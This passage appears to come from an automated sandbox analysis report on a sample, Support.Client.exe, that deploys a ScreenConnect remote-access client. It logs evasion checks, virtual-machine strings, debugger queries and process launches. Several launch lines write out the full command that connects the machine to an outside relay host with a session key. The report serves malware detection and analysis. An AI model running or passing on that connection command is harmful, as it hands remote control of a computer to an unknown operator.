                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596503Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595824Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595679Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595552Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594794Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594108Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593760Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593202Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593092Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Amcache.hve.4.drBinary or memory string: VMware
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                  Source: dfsvc.exe, 00000001.00000002.2539249322.000002515A6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2539249322.000002515A6FF000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2524797376.000002514022D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2938658022.000001DEBA413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2938677429.000001DEBA42F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2939790536.000001DEBFA5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.2938304911.000000000124C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C04573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C04573
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C01000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00C01000
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C03677 mov eax, dword ptr fs:[00000030h]0_2_00C03677
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C06893 GetProcessHeap,0_2_00C06893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C01493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C01493
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C04573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C04573
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C0191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C0191F
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C01AAC SetUnhandledExceptionFilter,0_2_00C01AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 884Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\467jxdcm.kdt\otwe8ppy.t3g\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\screenconnect.clientservice.exe" "?e=support&y=guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=bgiaaackaabsu0exaagaaaeaaqbdrypv%2fs%2bijgk1u%2flkqpsg%2bdg7f%2f4ax8qnsh9yo6i7a6uzday2kzfgamhsjf%2fkrmkc4kx%2fdk9zticrirrmqh3eoku1a3oxq2phk099m%2brhxm%2fsy2pwccl%2fy3eisydds8dysd7nyawc%2bzqbdk%2bcmbonghdqg5tz2dzsqbh4e9ppcohbmemq0olpi7s6np%2fbxp4rknbdymsyfm0a6kinc%2bdchq29f%2bxhgl%2fk%2fqmgvhtdipx8%2bo%2fttzqdolpxw57j20w3ypoh%2bhf7phxvddrwotzrarqotcrewuatoysrlumg3copsfhex5fryf45w%2bmrd4dxmwp56lw1jk7ocglwlfhe&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\467jxdcm.kdt\otwe8ppy.t3g\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\screenconnect.clientservice.exe" "?e=support&y=guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=bgiaaackaabsu0exaagaaaeaaqbdrypv%2fs%2bijgk1u%2flkqpsg%2bdg7f%2f4ax8qnsh9yo6i7a6uzday2kzfgamhsjf%2fkrmkc4kx%2fdk9zticrirrmqh3eoku1a3oxq2phk099m%2brhxm%2fsy2pwccl%2fy3eisydds8dysd7nyawc%2bzqbdk%2bcmbonghdqg5tz2dzsqbh4e9ppcohbmemq0olpi7s6np%2fbxp4rknbdymsyfm0a6kinc%2bdchq29f%2bxhgl%2fk%2fqmgvhtdipx8%2bo%2fttzqdolpxw57j20w3ypoh%2bhf7phxvddrwotzrarqotcrewuatoysrlumg3copsfhex5fryf45w%2bmrd4dxmwp56lw1jk7ocglwlfhe&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\467jxdcm.kdt\otwe8ppy.t3g\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\screenconnect.clientservice.exe" "?e=support&y=guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=bgiaaackaabsu0exaagaaaeaaqbdrypv%2fs%2bijgk1u%2flkqpsg%2bdg7f%2f4ax8qnsh9yo6i7a6uzday2kzfgamhsjf%2fkrmkc4kx%2fdk9zticrirrmqh3eoku1a3oxq2phk099m%2brhxm%2fsy2pwccl%2fy3eisydds8dysd7nyawc%2bzqbdk%2bcmbonghdqg5tz2dzsqbh4e9ppcohbmemq0olpi7s6np%2fbxp4rknbdymsyfm0a6kinc%2bdchq29f%2bxhgl%2fk%2fqmgvhtdipx8%2bo%2fttzqdolpxw57j20w3ypoh%2bhf7phxvddrwotzrarqotcrewuatoysrlumg3copsfhex5fryf45w%2bmrd4dxmwp56lw1jk7ocglwlfhe&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C01BD4 cpuid 0_2_00C01BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
